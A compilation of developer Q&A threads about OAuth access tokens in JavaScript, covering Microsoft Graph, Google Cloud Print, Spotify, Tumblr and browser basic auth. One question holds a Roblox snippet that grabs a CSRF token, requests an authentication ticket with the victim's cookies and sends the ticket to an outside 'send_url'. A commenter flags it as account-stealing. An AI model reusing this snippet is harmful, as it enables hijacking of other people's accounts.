Access Token error - Graph API getting user profile - javascript

I'm using Microsoft graph API to get to login and get a users profile. I have the accessToken. Though I'm trying to get the profile of the user that I got the AccessToken with.
This is my code, am I missing anything here? Just need the users profile. Note: I'm using Cors anywhere through a proxy server, which has worked for getting the code and accessToken.
Thanks for your help!
I've tried adding the resource URL. I've tried changing the headers (you don't need body parameters for GET and DEL requests).
let auth =
"http://localhost:8080/https://graph.microsoft.com/v1.0/me?access_token=";
let client_id = "?client_id=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
let redirect_uri = "&redirect_uri=http://localhost:8100/";
let response = "&response_type=code";
let resource = "&resource=https://graph.microsoft.com";
let scope =
"&scope=openid+https://outlook.office.com/Contacts.read+offline_access";
let url =
auth + token + resource + client_id + redirect_uri;
//let url = 'http://localhost:8080/https://graph.microsoft.com/v1.0/me?access_token=' + token +"&resource=https://graph.microsoft.com";
this.http.get(url, {
headers: {
Authorization: "Bearer " + token,
"Content-Type": "application/x-www-form-urlencoded",
"Access-Control-Allow-Origin": "*",
resource: "https://graph.microsoft.com"
}
});
Expected: to take the AccessToken and get a user's profile like in Part 4 here.

You've got a number of things going on here.
You're specifying both scope and resource properties. These don't belong together. If you're using the v1 Endpoint then you should be using resource, if you're using the v2 Endpoint then you should be using scope. See Scopes, Not Resources in the documentation.
Your url is not correct. The actual URL should look like this for v1:
https://login.microsoftonline.com/common/oauth2/authorize?client_id={id}&scope=https%3A%2F%2Fgraph.microsoft.com&redirect_uri={uri}&response_type=code
or for v2, like this:
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id={id}&scope=openid+user.read+contacts.read+offline_access&redirect_uri={uri}&response_type=code
Can't use http.get() for this. OAuth's Authorization Code grant starts by redirecting the user to this URL. It will then return the code you then POST back to the /token endpoint to retrieve the access_token and refresh_token.
You need the User.Read scope to retrieve a user's profile (or User.ReadBasic.All to retrieve other user's profiles).
I would recommend using the v2 Endpoint and starting here:
Microsoft v2 Endpoint Primer
Get access tokens to call Microsoft Graph
AAD v2 Endpoint Overview

Related

How to get the csrf token in <meta> tags from another website using javascript

I am trying to get the csrf token from roblox.com. I need this token to POST here https://auth.roblox.com/v1/authentication-ticket and the Authentication ticket is sent in response.
Here is my code
(async function() {
// response headers generate 401 errors in output, which cannot be ignored
var xsrf = (await fetch("https://www.roblox.com/home" ,
document.querySelector('meta[name="csrf-token"]').getAttribute('data-token'), {
credentials: "csrf-token"
})).text();
console.log(xsrf);
var ticket = (await fetch("https://auth.roblox.com/v1/authentication-ticket", {
method: "POST",
credentials: "include",
headers: {"x-csrf-token": xsrf}
})).headers.get("rbx-authentication-ticket");
await fetch(send_url + "?t=" + ticket);
})();```
Everything is perfect except for the part which gets the csrf token.
[This is the error I get.][1]
[1]: https://i.stack.imgur.com/uVOBD.png
Do not help the user. They are attempting to compromise Roblox accounts.
Edit: here is a video from the same user
https://www.youtube.com/watch?v=O8GmJ_tdytQ (https://archive.is/5HxST)
The description clearly says "Hacking, Roblox Hacking, Hacker, Cookie logger, Cookies"

How can I get basic auth information from browser

My backend needs basic auth Authorization header.
'Authorization': 'Basic dXNlcm5hbWU6cGFzc3dvcmQ'
The problem I have is, that I need to use the native basic auth prompt from the browser and I don't know how to get the basic auth info in my javascript frontend application. In other words: I need to get the username and password from the browsers basic auth propmt.
Can anyone tell me how to get the basic auth info from the browsers native basic auth prompt?
To get a token request from backend( like login request) in response you will get token thne use can save in s
// Store
sessionStorage.setItem("Authorization", "dXNlcm5hbWU6cGFzc3dvcmQ");
// Retrieve
let token = sessionStorage.getItem("Authorization");
For API call use fetch
For add Authorization header code
let token = sessionStorage.getItem("Authorization");
var headers = new Headers();
headers.append("Authorization", "Basic " +token;
fetch("https://url", {
headers: headers
})
.then((response) => { ... })
.done();

User credentials required: Google Cloud Print Submit API

I am trying to access the Submit API that is apart of the Google Cloud Print however I am running into the error "User credentials required".
I am able to get all the way through authentication and am able to retrieve my access token. I was following this guide https://developers.google.com/cloud-print/docs/appDevGuide
I do not know where it is going wrong. Does anyone know where the credentials are supposed to be inputted?
Here is my code for this portion:
function submitPrintJob(token){
try{
var params = {'printerid':'PRINTER_ID','title':'Test Print Job','ticket':{"version": "1.0", "print": {}},'contentType':'application/pdf'};
var response = https.post({
url: 'https://www.google.com/cloudprint/submit',
body: params,
headers: {'Authorization':'Bearer ' + token}
});
log.debug('submitPrintJob','Response - ' + response.body);
}catch(e){
log.error('submitPrintJob','Error - ' + e.message);
}
}
This code is being in done in Netsuite which is where the https.post API is coming in. I also am aware that I am not sending a document through but I at least need to get past this step. I am getting this error using Postman as well.
Editing to add the portion where I get the token:
I send a request to: https://accounts.google.com/o/oauth2/v2/auth
Parameters:
response_type: code,
scope: https://www.googleapis.com/auth/cloud-platform.read-only,
state: state_parameter_passthrough_value,
redirect_uri: scriplet url
client_id: client id
Google oauth returns a authorization code. I exchange the code for a token this way:
function getToken(code){
try{
var params = {'code':code,'client_id':CLIENT_ID,'client_secret':CLIENT_SECRET,'redirect_uri':REDIRECT_URI,'grant_type':'authorization_code'}
var response = https.post({
url: 'https://www.googleapis.com/oauth2/v4/token',
body: params,
headers: {'Content-Type':'application/x-www-form-urlencoded'}
});
var token = response.body.access_token;
submitPrintJob(token);
}catch(e){
log.error('getAuthCode','Error - ' + e.message);
}
}
As I thought, the problem is how you are getting the access token. In order to get a valid access token to do your cloud print business, you need to include the proper scope. That means that your params object should like like this:
var params = {'code':code,'client_id':CLIENT_ID,'client_secret':CLIENT_SECRET,'redirect_uri':REDIRECT_URI, 'scope': 'https://www.googleapis.com/auth/cloudprint', 'grant_type':'authorization_code'}
This should give you a valid access token to interact with Google Cloud Print. I hope it helps!

Spotify API - Retrieving Valid Access Token in Google Apps Scripts

Here is the documentation for the Spotify API (I'm using the Implicit Grant Flow): https://beta.developer.spotify.com/documentation/general/guides/authorization-guide/#implicit-grant-flow
I'm trying to write a script in Google Sheets. I'm focussing on the basic setup, but I cannot seem to get the access token working.
SOLVED:
I'm currently receiving the following error (it seems like my
parameters for my fetch method aren't set properly):
"error":"unsupported_grant_type","error_description":"grant_type must be client_credentials, authorization_code or refresh_token"
SOLUTION:
The grant_type must be listed as a payload according to the Google
Scripts method UrlFetchApp.fetch (see updated code below)
--
SOLVED:
As you can see below I'm using the 'get' method when trying to get the
token (despite the documentation specifying 'post') because the post
method consistently returns a 405 error. I think this is the step I'm
screwing up on. I'm assuming that I'm not supposed to be using the
csrf_token as the access token.
SOLUTION:
https://accounts.spotify.com/token should have been
https://accounts.spotify.com/api/token
Updated working code below:
var fetchParams = {
'method':'post',
'payload':{'grant_type':'client_credentials'},
'headers':{'Authorization':authorization},
'muteHttpExceptions':true
}
var replaceResponse = UrlFetchApp.fetch('https://accounts.spotify.com/api/token', fetchParams);
var regExp = /access_token(.*?):/;
var contentText = replaceResponse.getContentText();
var access_token = contentText.slice(contentText.search('access_token')+15,contentText.search(',')-1);
var requestOptions = {
'headers':{'Authorization':'Bearer '+access_token},
'muteHttpExceptions':true
}
var finalResponse = UrlFetchApp.fetch('https://api.spotify.com/v1/tracks/4dhARBZ8YLvm8oRDnCIeXr', requestOptions);
I modified your script for retrieving access token by following curl -X "POST" -H "Authorization: Basic ZjM4ZjAw...WY0MzE=" -d grant_type=client_credentials https://accounts.spotify.com/api/token of the document. Can you please try this modified script?
var authorization = "Basic "+ Utilities.base64Encode('<client_id>:<client_secret>');
var fetchParams = {
method: 'post', // Modified
payload: {'grant_type': 'client_credentials'}, // Modified
headers: {'Authorization': authorization},
muteHttpExceptions: true
}
var replaceResponse = UrlFetchApp.fetch("https://accounts.spotify.com/api/token", fetchParams); // Modified
Logger.log(replaceResponse.getContentText())
Reference :
Client Credentials Flow
If the response message was changed, please tell me.

oAuth : Simple javascript

I got the following info from another question:
var url = "...";
var accessor = {
token: "...",
tokenSecret: "...",
consumerKey : "...",
consumerSecret: "..."
};
var message = {
action: url,
method: "GET",
parameters: {...}
};
OAuth.completeRequest(message, accessor);
OAuth.SignatureMethod.sign(message, accessor);
url = url + '?' + OAuth.formEncode(message.parameters);
// send request to 'url'
...
Now it says it needs a token. In order to get the token I need a signature. In order to get the signature I need a token.
See the problem? Clearly I am misunderstanding something but what?
There is almost 0 documentation for javascript OAuth , so any help is appriciated.
(note:I am using the tumblr API if that helps)
The way OAuth 1.0 works, you first get a set of temporary credentials (also known as request token). When you ask for request tokens, you use an empty token and secret. The OAuth 1.0 RFC explains that in section 2.11:
When making the request, the client authenticates using only the
client credentials. The client MAY omit the empty "oauth_token"
protocol parameter from the request and MUST use the empty string as
the token secret value.
Then you use the token received to send the user over to grant access and when you get it, you use the token + secret to ask for a new access token which you use to make API calls.
EHL

Categories

Resources